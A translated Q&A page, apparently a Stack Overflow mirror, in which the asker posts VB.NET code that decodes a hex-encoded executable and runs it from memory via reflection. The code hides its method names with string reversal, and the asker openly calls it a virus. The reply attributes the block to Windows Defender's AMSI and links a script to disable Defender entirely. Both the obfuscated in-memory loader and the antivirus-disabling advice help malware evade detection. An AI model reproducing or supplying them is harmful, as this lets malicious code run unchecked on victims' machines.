操作未成功完成,因为该文件包含病毒或可能不需要的软件。(HRESULT 异常:0x800700E1)
Sor*_*ell 5 vb.net memory virus visual-studio
伙计们,我在 Visual Studio 中的 vb.net 中编码时遇到问题。这是我的代码,它将 .EXE 文件十六进制转换为字节并直接从内存运行。
Imports System.Linq,System.Reflection
Public Module Module1
Public Sub Main()
Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Dim q1 As Object = Assembly.Load(HexToByte(n))
Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)
End Sub
Public Function HexToByte(ByVal str As String) As Byte()
Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
Return xData
End Function
End Module
当我使用 F5 键调试它时,它显示完整消息,如下所示:
System.BadImageFormatException:
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies.
An attempt was made to load a program with an incorrect format.'
并且
Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
(Exception from HRESULT: 0x800700E1)
伙计们,这些消息表明我正在编写病毒,而且这是真的。
但我多次使用这段代码,但它没有返回任何异常。
但现在不允许我了。怎么解决这个问题???
由于它提到它包含病毒,
所以可能 AMSI(Win Defender 组件)正在阻止病毒运行,
由于执行恶意命令时 powershell 中也会出现此错误消息,
因此 AMSI 会阻止它,信息取自0x00-0x00.github.io
运行此 VBS 脚本以完全禁用防御者,
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs
| 归档时间: |
|
| 查看次数: |
9484 次 |
| 最近记录: |